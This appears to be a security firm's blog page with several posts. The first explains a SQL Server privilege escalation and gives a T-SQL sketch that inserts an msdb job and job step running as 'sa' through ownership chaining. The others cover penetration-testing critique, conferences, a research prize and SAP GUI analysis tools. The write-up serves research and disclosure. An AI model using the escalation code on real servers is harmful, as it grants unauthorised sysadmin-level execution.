I was playing with a few SQL server idiosyncrasies more than a year ago before becoming so completely distracted with the whole SAP protocol-decoding business. Having some time on my hands for once, I thought I would blog it.
Early last year, I found it was possible for an unprivileged user to create jobs owned by other users on MS SQL Server (2000, 2005 and 2008) - provided the user had the ability to create or alter stored procedures in the [master].[dbo] schema. The reason is that cross-database ownership chaining is enabled, by default, across the system databases [master], [msdb] and [tempdb]. According to Microsoft, this is by design.
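You can confirm this default for yourself. On SQL 2005/2008 the chaining setting is exposed in the [sys].[databases] catalog view (on SQL 2000 the equivalent is sp_dboption's 'db chaining' setting):

```sql
-- Check which databases have cross-database ownership chaining enabled.
-- On a default install, master, msdb and tempdb report 1 (enabled),
-- while user databases report 0.
SELECT name, is_db_chaining_on
FROM sys.databases
WHERE name IN ('master', 'msdb', 'tempdb');
```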
The issue arises when a lower-privileged user is able to create or alter stored procedures within [master].[dbo]: it then becomes possible to insert records into the [msdb].[dbo].[sysjobs*] tables by executing the stored procedure - even without any direct permission to insert records into those tables. This is not particularly different from other system stored procedures (such as sp_addjob, for example) which allow users to create jobs, but the difference lies in the data we're allowed to populate.
SQL Server allows jobs and job steps to be executed under the context of specific user accounts. Whilst the majority of users (by default) are able to schedule jobs on the SQL Server, they can only schedule jobs which execute under their own account context, and only members of the sysadmin server role can add jobs which execute under the context of other user accounts. The underlying system stored procedures provided by Microsoft (sp_addjob and similar) prevent this functionality from being abused by lower-privileged users. However, should it be possible to create/alter a stored procedure within [master].[dbo], we can insert records into the various [msdb] job tables with data of our choosing.
Hard-coding the [owner_sid] field in [msdb].[dbo].[sysjobs] to 0x01 (the default sid for the 'sa' user account) and the [database_user_name] field in [msdb].[dbo].[sysjobsteps] to 'sa' will allow us to create a job and associated job-step owned by the 'sa' user even though we are using an unprivileged account and do not have any permissions on the underlying tables.
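As a minimal sketch of the idea (the procedure name, job name and step command are purely illustrative, and the column lists are abbreviated - the real tables have further NOT NULL columns, which the downloadable procedures populate in full):

```sql
USE [master];
GO
-- Hypothetical procedure created in [master].[dbo] by a low-privileged
-- user. Because ownership chaining links the system databases, the
-- INSERTs below succeed even though the caller has no direct INSERT
-- permission on the msdb job tables.
CREATE PROCEDURE [dbo].[sp_add_job_as_sa]  -- illustrative name
AS
BEGIN
    DECLARE @job_id UNIQUEIDENTIFIER;
    SET @job_id = NEWID();

    INSERT INTO [msdb].[dbo].[sysjobs] (job_id, name, enabled, owner_sid)
    VALUES (@job_id, N'maintenance task', 1,
            0x01);  -- 0x01: the default sid of the 'sa' account

    INSERT INTO [msdb].[dbo].[sysjobsteps]
        (job_id, step_id, step_name, subsystem, command,
         database_name, database_user_name)
    VALUES (@job_id, 1, N'step 1', N'TSQL', N'SELECT 1',
            N'master',
            N'sa');  -- step executes in the security context of 'sa'
END
GO
```

The unprivileged caller then simply executes the procedure; the chained permissions do the rest.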
In the following image, user eoppoc has no direct access to [msdb].[dbo].[sysjobs].
Executing a stored procedure, however, allows this access.
The following two images show the job created as user 'sa', with a single job step configured to execute as user 'sa'.
Honestly, I don't really see this as any form of issue. In order for it to be exploitable, there are far too many prerequisites, and those prerequisites open other cans of worms of their own. Furthermore, whilst one has the capability to schedule jobs to run as other users, one does not have the privilege level required to update the job cache. This means the newly created and scheduled job will only run after the SQL Server Agent has been restarted. It is nevertheless interesting and blog-worthy. And who knows, maybe this will be interesting / useful to somebody.
A zip file containing a procedure for SQL2000, and a procedure for SQL2005/2008 can be downloaded from here.
Oh - as a final note, Microsoft mentions that: "These databases are strictly system databases and is recommended not to create any user objects in these databases".
It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know, a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The talk raises some interesting ideas and I felt I'd like to comment on some of the points he was making.
As I understood it, the talk's hypothesis could be (over) simplified as follows:
Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.
It is fair to say that the entire process within which security testing functions is not having the desired effect; hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.
A significant and interesting component of the talk's thesis has to do with the role of "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't tend to under-emphasise or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand, but if your opponent has a joker he's going to smoke you every time. In this, the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby to illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.
What I struggle to understand, however, is why the talk emphasizes this particular 'joker' over a number of others that seem apparent to me. For example, why not have a "malicious system administrator" card, a "spear phishing" card, a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrates, there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't invalidate penetration testing itself; it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.
The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.
Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.
Solving the security problem in total is sadly still going to take a whole lot more work...
This year, for the fourth time, some others here at SensePost and I have worked together with the team from ITWeb in the planning of their annual Security Summit. A commercial conference is always (I suspect) a delicate balance between the different drivers from business, technology and 'industry', but this year's event is definitely our best effort thus far. ITWeb has more than ever acknowledged the centrality of good, objective content and has worked closely with us as the Technical Committee and their various sponsors to strike the optimal balance. I don't think we have it 100% right yet, and there are some improvements and initiatives that will unfortunately only manifest at next year's event, but this year's program (here and here) is nevertheless first class and comparable with almost anything else I've seen.
<Shameless plug>If you're in South Africa, and you haven't registered, I highly recommend that you do</Shameless plug>

This year's Summit explores the idea that trust in CyberSpace is "broken" and that, one by one, all the pillars we relied on to tame the Internet and make it a safe place to do business in have failed. Basically, the event poses the question: "What now?"
We've tried hard to get all our speakers to align in some way with this theme. Sadly, as is often the case, we had fewer submissions from local experts than we hoped, but we were able to round up a pretty killer program, including a VIP list of visiting stars.
After the plenaries each day, the program is divided into themed tracks where talks on a topic are grouped together. Where possible we've tried to include as many different perspectives and opinions as possible. Here's a brief summary of my personal highlights:
It's gonna be excellent. See you there!
On Saturday Dec 3, at BSides Cape Town we announced the winner of a prize for local information security research. The purpose of the competition was twofold. Firstly, to highlight interesting research produced in .za for the purpose of publicising up 'n coming security folks, since there are a few disparate communities (academic / industry is the greatest split). Secondly, to provide some degree of reward in the form of a cash prize. The prize is (unsurprisingly) not meant to compensate for time spent, but rather to give the typical researcher who conducts the work in their spare time some recognition and perhaps a cool gadget to associate with the work.
The competition was a little disappointing for a single, but significant, reason: the lack of nominations. In all, six people nominated three pieces of work from two researchers. Considering there were four security conferences this year in South Africa, it's not possible that even a reasonable minority of the research produced was considered for the prize. This was a no-strings-attached cash prize; there is no handover of IP or copyright, and no requirements on the winner (though we do offer an interview on our blog to publicise their work, should they choose to). With this in mind, it's strange how few nominations were received; for example, while the competition received some coverage on Twitter, very few nominations originated from there. The timing was tight (competition announced two weeks prior to BSides), but that only accounts for a smaller reach, not a lack of involvement.
The two nominees were:
Thanks to Pieter for organising BSides Cape Town and providing us a spot to announce the winners, and thanks to everyone who sent in a nomination. Compliments to both nominees for having their work recognised by others in the community, and congratulations to Etienne for winning the prize.
We remain committed to research and the sponsorship concept, so expect an announcement towards the end of next year and keep an eye open during the year for research that strikes you as interesting.
[2011/9/6 Edited to add Slideshare embed]
I am currently in London at the first ever 44con conference. It's been a fantastic experience so far - excellent talks & friendly people.
Yesterday, I presented a paper titled "Systems Applications Proxy Pwnage". The talk precis sums it up nicely:
It has been common knowledge for a number of years that SAP GUI communicates using an unencrypted and compressed protocol by default, and numerous papers have been published by security professionals and researchers dealing with decompressing this traffic.
Until now, most of these methods have been time consuming, convoluted and have focussed more on obtaining sensitive information (such as credentials) than a thorough understanding of the protocol used by SAP GUI.
During this presentation, the speaker will focus on the protocol used by SAP GUI. The speaker will demo and release a new tool-set to assist security professionals in parsing, decompressing and understanding this protocol, as well as demonstrate how this formerly sacrosanct protocol makes SAP applications potentially vulnerable to a wide-range of attacks which have plagued web applications for years.
The talk went very well. All demos worked perfectly. My newly authored toolset not only seems to have performed admirably during the presentation, but also seems to be in some demand...
As such, I'm pleased to announce the public release of two tools - SApCap and SAPProx.
SApCap is a Java-based packet sniffer, decompressor and protocol analysis tool for SAP GUI. It makes use of a third-party JNI interface for pcap (get it here) and a custom-built JNI decompression interface for SAP. You can download it here.
SAPProx is what I believe to be the world's first ever SAP GUI proxy. Think of it as WebScarab for SAP. You can download it here.
The programs are GPL, and the sources are also available from the relevant pages.
The custom JNI library used for decompressing SAP traffic is also available from the previously mentioned download pages in both binary and source formats. I have, however, only had the opportunity to build binary libraries for Mac OS X, Linux (32-bit) and Windows (32-bit). I will add more binary libraries as soon as I get back to ZA and have access to some different build environments again.
If you're interested, a copy of my 44con presentation is available from here or below.